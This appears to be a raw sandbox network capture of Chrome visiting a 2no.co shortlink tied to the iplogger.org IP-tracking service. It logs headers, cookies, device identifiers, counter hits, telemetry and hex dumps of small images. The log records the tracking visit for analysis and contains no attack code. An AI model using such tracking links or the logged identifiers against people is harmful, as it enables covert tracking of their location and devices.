                                                                            Location: https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.07021634166148738
                                                                            Expires: Sun, 30 Jul 2023 21:00:00 GMT
                                                                            Pragma: no-cache
                                                                            Cache-control: no-cache
                                                                            P3P: policyref="/w3c/p3p.xml", CP="UNI"
                                                                            Set-Cookie: FTID=1cg1uo1y3WOr1cg1uo00241O; path=/; expires=Tue, 29 Jul 2025 21:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
                                                                            Strict-Transport-Security: max-age=86400
                                                                            2024-07-29 22:56:50 UTC32INData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 4d 6f 76 65 64 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <html><body>Moved</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.64973935.190.80.14433136C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-29 22:56:50 UTC535OUTOPTIONS /report/v4?s=wepIYRj6hGg3QGVIT5VH6A70mLLrXrHRIZacHp5Uj9LFm07dm8md12BJjcIUgxXzHYylLEQH6abs8VB7e%2BsKS1HygcQDMquR0M2QLhBEeTy684s%2BdJAkYP%2BfKFsCcxn0guxL HTTP/1.1
                                                                            Host: a.nel.cloudflare.com
                                                                            Connection: keep-alive
                                                                            Origin: https://cdn.iplogger.org
                                                                            Access-Control-Request-Method: POST
                                                                            Access-Control-Request-Headers: content-type
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-07-29 22:56:51 UTC336INHTTP/1.1 200 OK
                                                                            Content-Length: 0
                                                                            access-control-max-age: 86400
                                                                            access-control-allow-methods: OPTIONS, POST
                                                                            access-control-allow-origin: *
                                                                            access-control-allow-headers: content-type, content-length
                                                                            date: Mon, 29 Jul 2024 22:56:50 GMT
                                                                            Via: 1.1 google
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7192.168.2.649738173.222.162.64443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-29 22:56:51 UTC2256OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                            Origin: https://www.bing.com
                                                                            Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                            Accept: */*
                                                                            Accept-Language: en-CH
                                                                            Content-type: text/xml
                                                                            X-Agent-DeviceId: 01000A410900C4F3
                                                                            X-BM-CBT: 1696488253
                                                                            X-BM-DateFormat: dd/MM/yyyy
                                                                            X-BM-DeviceDimensions: 784x984
                                                                            X-BM-DeviceDimensionsLogical: 784x984
                                                                            X-BM-DeviceScale: 100
                                                                            X-BM-DTZ: 120
                                                                            X-BM-Market: CH
                                                                            X-BM-Theme: 000000;0078d7
                                                                            X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                            X-Device-ClientSession: 1D6F504B5A5A465DBDB84F31C63A581D
                                                                            X-Device-isOptin: false
                                                                            X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                            X-Device-OSSKU: 48
                                                                            X-Device-Touch: false
                                                                            X-DeviceID: 01000A410900C4F3
                                                                            X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshldspcl40,msbdsborgv2co,msbwdsbi920cf,optfsth3,premsbdsbchtupcf,wsbfixcachec,wsbqfasmsall_c,wsbqfminiserp_c,wsbref-c
                                                                            X-MSEdge-ExternalExpType: JointCoord
                                                                            X-PositionerType: Desktop
                                                                            X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                            X-Search-CortanaAvailableCapabilities: None
                                                                            X-Search-SafeSearch: Moderate
                                                                            X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time
                                                                            X-UserAgeClass: Unknown
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                            Host: www.bing.com
                                                                            Content-Length: 516
                                                                            Connection: Keep-Alive
                                                                            Cache-Control: no-cache
                                                                            Cookie: SRCHUID=V=2&GUID=CE2BE0509FF742BD822F50D98AD10391&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231005; SRCHHPGUSR=SRCHLANG=en&HV=1696488191&IPMH=5767d621&IPMID=1696488252989&LUT=1696487541024; CortanaAppUID=2020E25DAB158E420BA06F1C8DEF7959; MUID=81C61E09498D41CC97CDBBA354824ED1; _SS=SID=1D9FAF807E686D422B86BC217FC66C71&CPID=1696488253968&AC=1&CPH=071f2185; _EDGE_S=SID=1D9FAF807E686D422B86BC217FC66C71; MUIDB=81C61E09498D41CC97CDBBA354824ED1
                                                                            2024-07-29 22:56:51 UTC1OUTData Raw: 3c
                                                                            Data Ascii: <
                                                                            2024-07-29 22:56:51 UTC515OUTData Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 38 31 43 36 31 45 30 39 34 39 38 44 34 31 43 43 39 37 43 44 42 42 41 33 35 34 38 32 34 45 44 31 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 33 35 31 41 41 38 32 41 45 39 30 43 34 36 36 39 39 46 35 42 31 46 45 33 34 32 42 45 37 45 31 30 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49
                                                                            Data Ascii: ClientInstRequest><CID>81C61E09498D41CC97CDBBA354824ED1</CID><Events><E><T>Event.ClientInst</T><IG>351AA82AE90C46699F5B1FE342BE7E10</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
                                                                            2024-07-29 22:56:51 UTC480INHTTP/1.1 204 No Content
                                                                            Access-Control-Allow-Origin: *
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            X-MSEdge-Ref: Ref A: 4A08A98A0FB64F6CB8B62E42CE4B4EEE Ref B: LAX311000111049 Ref C: 2024-07-29T22:56:51Z
                                                                            Date: Mon, 29 Jul 2024 22:56:51 GMT
                                                                            Connection: close
                                                                            Alt-Svc: h3=":443"; ma=93600
                                                                            X-CDN-TraceID: 0.40a6dc17.1722293811.120626bd


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.64974135.190.80.14433136C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-29 22:56:51 UTC476OUTPOST /report/v4?s=wepIYRj6hGg3QGVIT5VH6A70mLLrXrHRIZacHp5Uj9LFm07dm8md12BJjcIUgxXzHYylLEQH6abs8VB7e%2BsKS1HygcQDMquR0M2QLhBEeTy684s%2BdJAkYP%2BfKFsCcxn0guxL HTTP/1.1
                                                                            Host: a.nel.cloudflare.com
                                                                            Connection: keep-alive
                                                                            Content-Length: 424
                                                                            Content-Type: application/reports+json
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-07-29 22:56:51 UTC424OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 36 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 32 6e 6f 2e 63 6f 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 33 32 2e 31 31 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f
                                                                            Data Ascii: [{"age":0,"body":{"elapsed_time":663,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://2no.co/","sampling_fraction":1.0,"server_ip":"172.67.132.113","status_code":403,"type":"http.error"},"type":"network-error","url":"https://
                                                                            2024-07-29 22:56:51 UTC168INHTTP/1.1 200 OK
                                                                            Content-Length: 0
                                                                            date: Mon, 29 Jul 2024 22:56:51 GMT
                                                                            Via: 1.1 google
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.64974088.212.201.2044433136C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-29 22:56:51 UTC707OUTGET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.07021634166148738 HTTP/1.1
                                                                            Host: counter.yadro.ru
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: image
                                                                            Referer: https://2no.co/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Cookie: FTID=1cg1uo1y3WOr1cg1uo00241O
                                                                            2024-07-29 22:56:52 UTC481INHTTP/1.1 200 OK
                                                                            Server: nginx/1.17.9
                                                                            Date: Mon, 29 Jul 2024 22:56:52 GMT
                                                                            Content-Type: image/gif
                                                                            Content-Length: 445
                                                                            Connection: close
                                                                            Expires: Sun, 30 Jul 2023 21:00:00 GMT
                                                                            Pragma: no-cache
                                                                            Cache-control: no-cache
                                                                            P3P: policyref="/w3c/p3p.xml", CP="UNI"
                                                                            Set-Cookie: VID=2DNPIG0nbdur1cg1uq002NPY; path=/; expires=Tue, 29 Jul 2025 21:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
                                                                            Access-Control-Allow-Origin: *
                                                                            Strict-Transport-Security: max-age=86400
                                                                            2024-07-29 22:56:52 UTC445INData Raw: 47 49 46 38 37 61 1f 00 1f 00 d5 00 00 02 02 02 82 56 06 da be 86 42 2e 0a c2 82 02 22 1a 06 a2 6a 06 32 26 08 62 42 06 de ae 42 fa de a1 b2 76 02 5a 4e 3e ea a2 16 2a 26 1a ee d6 aa 52 36 06 2a 22 0a da a2 2a 3a 26 08 94 62 06 da 92 02 a6 72 12 26 22 0b ac 72 02 4a 2e 0a ca 86 02 72 4a 06 fe de 9e ba 7a 02 f2 de ae 24 1e 0e 36 26 08 fe de 9a fe ba 32 fe c6 52 fe aa 02 5e 3e 08 8e 5e 06 9e 6a 06 7e 52 06 f2 da b2 4e 36 0a 6a 46 06 f7 de a6 26 1e 0a a5 6e 02 f2 da ae 56 3a 0a 3e 2a 08 de 96 06 4e 32 06 86 5a 06 46 2e 06 c6 86 02 b6 7a 02 2e 22 08 96 66 06 ae 76 02 ce 8a 02 76 4e 06 bc 7e 02 f6 de aa c6 82 02 2c 00 00 00 00 1f 00 1f 00 00 06 e2 c0 10 67 a8 28 16 59 48 96 6f e9 f3 bc 9e d0 94 54 fa 48 84 46 a4 ac 76 cb ed 76 1b 94 ab 77 4c d6 6a c2 d8 b2 9a
                                                                            Data Ascii: GIF87aVB."j2&bBBvZN>*&R6*"*:&br&"rJ.rJz$6&2R^>^j~RN6jF&nV:>*N2ZF.z."fvvN~,g(YHoTHFvvwLj


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.649744172.67.132.1134433136C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-29 22:56:52 UTC577OUTGET /favicon.ico HTTP/1.1
                                                                            Host: cdn.iplogger.org
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: image
                                                                            Referer: https://2no.co/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-07-29 22:56:52 UTC763INHTTP/1.1 200 OK
                                                                            Date: Mon, 29 Jul 2024 22:56:52 GMT
                                                                            Content-Type: image/x-icon
                                                                            Content-Length: 2833
                                                                            Connection: close
                                                                            last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                                                                            etag: "629f3a26-b11"
                                                                            strict-transport-security: max-age=31536000
                                                                            x-frame-options: SAMEORIGIN
                                                                            Cache-Control: max-age=14400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 6490
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2FuU%2Bxp1oN3x3M5GtoZoziQ45J4yObHhGTIxws2KFdu%2BeFWB5ZJ%2F6H2yyhHwiPwt0nNTwR9XXa%2BpWklmbTmZYRSECIR9i75kgYmT0G3%2FxJlV%2FPAXxZRmHxxpBZ5UvLJX34qN"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8ab0b46a1c3e32d3-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-07-29 22:56:52 UTC606INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0a d8 49 44 41 54 78 9c dd 9b 7f 8c db 65 1d c7 5f 4f 73 6d 97 cb 85 bb 2c 75 59 96 73 59 49 9d 77 c7 24 c8 0c d1 8d 8e 1f 0a 0c b0 18 98 3a 56 6a 44 c6 cf 21 82 80 01 6f 25 86 ac 14 f9 35 24 82 0a a2 a0 d6 ca cf 09 96 20 28 99 93 3b 7e 38 06 22 ce eb c4 ba ce cb b2 10 68 2e bb cb 72 b9 5e 2f 7d fc e3 f3 7c d7 de 71 6d bf 4f af 77 18 df 49 f3 6d da ef e7 f9 3e cf e7 79 3e bf 3f 5f c5 02 c1 9b ce 3b 5f 3d c0 62 80 52 34 58 88 e5 34 c0 32 e0 88 f9 94 53 21 b5 50 d3 a2 6d 3e 07 f7 a6 f3 1d c0 2a 60 0d b0 1a e8 01 96 03 ed 40 1a b8 cc cc e1 4f 08 13 c6 80 5c 2c a7 f7 01 6f 00 83 40 2e 15 52 53 f3 35 c7 96 33 c0 9b ce b7 03 eb 81 4d c0 a9 40 a0 c6 ad 9e aa
                                                                            Data Ascii: PNGIHDR@@iqIDATxe_Osm,uYsYIw$:VjD!o%5$ (;~8"h.r^/}|qmOwIm>y>?_;_=bR4X42S!Pm>*`@O\,o@.RS53M@
                                                                            2024-07-29 22:56:52 UTC1369INData Raw: 64 f9 3c a0 0b 78 0a 38 08 4c 21 a7 a6 0b 38 13 b8 06 61 56 23 bc 0a 7c 3e 15 52 13 b3 fd 39 2b 03 bc e9 bc 0f 09 50 1a 1e a1 1a 98 04 7e 09 dc 5e 8a 06 f7 3b 3f fa 23 71 90 e3 b9 14 d9 c9 0e 64 87 47 80 61 60 a4 98 49 b8 f2 f5 63 39 dd 06 5c 0a dc 43 63 27 2c 09 6c 9d 2d ca ac c5 80 eb cd c0 cd e0 6d e4 48 ef 2e 45 83 ce a2 bb 81 0b 80 73 11 73 b5 98 e9 3a a0 6c 3e c3 c0 d5 c5 4c e2 05 00 ad 75 1b b2 db 67 23 51 e4 08 30 00 3c a5 94 1a 33 9a 7e 3d 62 9a eb b9 c5 93 c0 da 54 48 ed 99 f9 c7 87 18 e0 4d e7 bb 11 f7 f6 18 d7 4b ae e0 61 e0 da 52 34 38 0e e0 8f c4 57 02 5b 81 af 36 98 a0 83 3f 00 e7 16 33 89 29 ad f5 72 e0 57 48 64 38 13 07 81 6f 28 a5 5e 02 88 e5 f4 8d c0 5d 0d c6 7e 15 38 65 66 34 39 8d 01 46 eb ff 0c b8 c4 c5 64 ab 51 46 16 7a 67 29 1a 2c
                                                                            Data Ascii: d<x8L!8aV#|>R9+P~^;?#qdGa`Ic9\Cc',l-mH.Ess:l>Lug#Q0<3~=bTHMKaR48W[6?3)rWHd8o(^]~8ef49FdQFzg),
                                                                            2024-07-29 22:56:52 UTC858INData Raw: 52 bb 81 53 80 8b 90 5d 1f 02 9e ab 1e 78 26 03 f6 21 b6 dd 16 97 63 62 84 62 26 f1 1e 70 16 92 d9 6d 45 3b eb 7e e0 4b c0 b7 8b 99 c4 64 b2 a0 bb 80 67 99 bd 4d cf 83 e4 fc ff 0a dc 9e 2c e8 2e a3 1f d2 48 0a 6c 93 c9 1c 1d c5 6c e5 f1 15 88 97 e4 36 de 9f 00 ce 2e 45 83 bb 7a 07 46 3d 80 2f 1b ee 9c 00 30 85 d2 9b 90 82 ab 6d b9 fd 00 f0 43 e0 a1 62 26 71 04 20 59 d0 3d 88 b2 76 eb f2 1e 44 aa d4 a9 fe c0 ec 4d d6 b5 1a 24 6e c6 5d 6f 90 d3 df f3 70 e8 e3 8b 41 3a 36 6e 40 52 da bb b2 e1 4e a7 41 22 80 14 25 23 88 e5 58 86 ec 96 a7 6a 9c 29 c4 b1 1a 44 76 78 67 95 99 23 59 d0 01 20 4b 73 3d 8a 83 c0 19 fd 81 0f b7 c9 d4 ca 06 6d 47 ec 6a a3 2a ef 76 e0 e1 52 34 08 03 a3 5f 40 76 6c 11 92 d4 dc d1 3b 30 ba 0d d8 9b 0d 77 16 10 65 f9 a8 3f 12 f7 21 a7 61
                                                                            Data Ascii: RS]x&!cbb&pmE;~KdgM,.Hll6.EzF=/0mCb&q Y=vDM$n]opA:6n@RNA"%#Xj)Dvxg#Y Ks=mGj*vR4_@vl;0we?!a


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            11192.168.2.64974588.212.201.1984433136C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-29 22:56:53 UTC511OUTGET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.07021634166148738 HTTP/1.1
                                                                            Host: counter.yadro.ru
                                                                            Connection: keep-alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Cookie: FTID=1cg1uo1y3WOr1cg1uo00241O; VID=2DNPIG0nbdur1cg1uq002NPY
                                                                            2024-07-29 22:56:53 UTC459INHTTP/1.1 200 OK
                                                                            Server: nginx/1.17.9
                                                                            Date: Mon, 29 Jul 2024 22:56:53 GMT
                                                                            Content-Type: image/gif
                                                                            Content-Length: 445
                                                                            Connection: close
                                                                            Expires: Sun, 30 Jul 2023 21:00:00 GMT
                                                                            Pragma: no-cache
                                                                            Cache-control: no-cache
                                                                            P3P: policyref="/w3c/p3p.xml", CP="UNI"
                                                                            Set-Cookie: FTID=0; path=/; expires=Sat, 01 Jan 2000 00:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
                                                                            Access-Control-Allow-Origin: *
                                                                            Strict-Transport-Security: max-age=86400
                                                                            2024-07-29 22:56:53 UTC445INData Raw: 47 49 46 38 37 61 1f 00 1f 00 d5 00 00 02 02 02 82 56 06 da be 86 42 2e 0a c2 82 02 22 1a 06 a2 6a 06 32 26 08 62 42 06 de ae 42 fa de a1 b2 76 02 5a 4e 3e ea a2 16 2a 26 1a ee d6 aa 52 36 06 2a 22 0a da a2 2a 3a 26 08 94 62 06 da 92 02 a6 72 12 26 22 0b ac 72 02 4a 2e 0a ca 86 02 72 4a 06 fe de 9e ba 7a 02 f2 de ae 24 1e 0e 36 26 08 fe de 9a fe ba 32 fe c6 52 fe aa 02 5e 3e 08 8e 5e 06 9e 6a 06 7e 52 06 f2 da b2 4e 36 0a 6a 46 06 f7 de a6 26 1e 0a a5 6e 02 f2 da ae 56 3a 0a 3e 2a 08 de 96 06 4e 32 06 86 5a 06 46 2e 06 c6 86 02 b6 7a 02 2e 22 08 96 66 06 ae 76 02 ce 8a 02 76 4e 06 bc 7e 02 f6 de aa c6 82 02 2c 00 00 00 00 1f 00 1f 00 00 06 e2 c0 10 67 a8 28 16 59 48 96 6f e9 f3 bc 9e d0 94 54 fa 48 84 46 a4 ac 76 cb ed 76 1b 94 ab 77 4c d6 6a c2 d8 b2 9a
                                                                            Data Ascii: GIF87aVB."j2&bBBvZN>*&R6*"*:&br&"rJ.rJz$6&2R^>^j~RN6jF&nV:>*N2ZF.z."fvvN~,g(YHoTHFvvwLj


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.2.649747172.67.132.1134433136C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-29 22:56:53 UTC351OUTGET /favicon.ico HTTP/1.1
                                                                            Host: cdn.iplogger.org
                                                                            Connection: keep-alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-07-29 22:56:53 UTC757INHTTP/1.1 200 OK
                                                                            Date: Mon, 29 Jul 2024 22:56:53 GMT
                                                                            Content-Type: image/x-icon
                                                                            Content-Length: 2833
                                                                            Connection: close
                                                                            last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                                                                            etag: "629f3a26-b11"
                                                                            strict-transport-security: max-age=31536000
                                                                            x-frame-options: SAMEORIGIN
                                                                            Cache-Control: max-age=14400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 6491
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w5tzPLmglCSG%2F%2BofcB5Ux92lvL4JDtWpuh4xhCsBTqYjlSMhnEIdT925ctGYHrcL7fqfdOgVIlwRcqxQfNRzb0CkOFyjb%2B21j6pzUae9eE9xCxCqWq5BoQePKMSJwmPt%2BbvC"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8ab0b46e4edc4210-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-07-29 22:56:53 UTC612INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0a d8 49 44 41 54 78 9c dd 9b 7f 8c db 65 1d c7 5f 4f 73 6d 97 cb 85 bb 2c 75 59 96 73 59 49 9d 77 c7 24 c8 0c d1 8d 8e 1f 0a 0c b0 18 98 3a 56 6a 44 c6 cf 21 82 80 01 6f 25 86 ac 14 f9 35 24 82 0a a2 a0 d6 ca cf 09 96 20 28 99 93 3b 7e 38 06 22 ce eb c4 ba ce cb b2 10 68 2e bb cb 72 b9 5e 2f 7d fc e3 f3 7c d7 de 71 6d bf 4f af 77 18 df 49 f3 6d da ef e7 f9 3e cf e7 79 3e bf 3f 5f c5 02 c1 9b ce 3b 5f 3d c0 62 80 52 34 58 88 e5 34 c0 32 e0 88 f9 94 53 21 b5 50 d3 a2 6d 3e 07 f7 a6 f3 1d c0 2a 60 0d b0 1a e8 01 96 03 ed 40 1a b8 cc cc e1 4f 08 13 c6 80 5c 2c a7 f7 01 6f 00 83 40 2e 15 52 53 f3 35 c7 96 33 c0 9b ce b7 03 eb 81 4d c0 a9 40 a0 c6 ad 9e aa
                                                                            Data Ascii: PNGIHDR@@iqIDATxe_Osm,uYsYIw$:VjD!o%5$ (;~8"h.r^/}|qmOwIm>y>?_;_=bR4X42S!Pm>*`@O\,o@.RS53M@
                                                                            2024-07-29 22:56:53 UTC1369INData Raw: 0a 38 08 4c 21 a7 a6 0b 38 13 b8 06 61 56 23 bc 0a 7c 3e 15 52 13 b3 fd 39 2b 03 bc e9 bc 0f 09 50 1a 1e a1 1a 98 04 7e 09 dc 5e 8a 06 f7 3b 3f fa 23 71 90 e3 b9 14 d9 c9 0e 64 87 47 80 61 60 a4 98 49 b8 f2 f5 63 39 dd 06 5c 0a dc 43 63 27 2c 09 6c 9d 2d ca ac c5 80 eb cd c0 cd e0 6d e4 48 ef 2e 45 83 ce a2 bb 81 0b 80 73 11 73 b5 98 e9 3a a0 6c 3e c3 c0 d5 c5 4c e2 05 00 ad 75 1b b2 db 67 23 51 e4 08 30 00 3c a5 94 1a 33 9a 7e 3d 62 9a eb b9 c5 93 c0 da 54 48 ed 99 f9 c7 87 18 e0 4d e7 bb 11 f7 f6 18 d7 4b ae e0 61 e0 da 52 34 38 0e e0 8f c4 57 02 5b 81 af 36 98 a0 83 3f 00 e7 16 33 89 29 ad f5 72 e0 57 48 64 38 13 07 81 6f 28 a5 5e 02 88 e5 f4 8d c0 5d 0d c6 7e 15 38 65 66 34 39 8d 01 46 eb ff 0c b8 c4 c5 64 ab 51 46 16 7a 67 29 1a 2c fb 23 f1 45 c0 2d
                                                                            Data Ascii: 8L!8aV#|>R9+P~^;?#qdGa`Ic9\Cc',l-mH.Ess:l>Lug#Q0<3~=bTHMKaR48W[6?3)rWHd8o(^]~8ef49FdQFzg),#E-
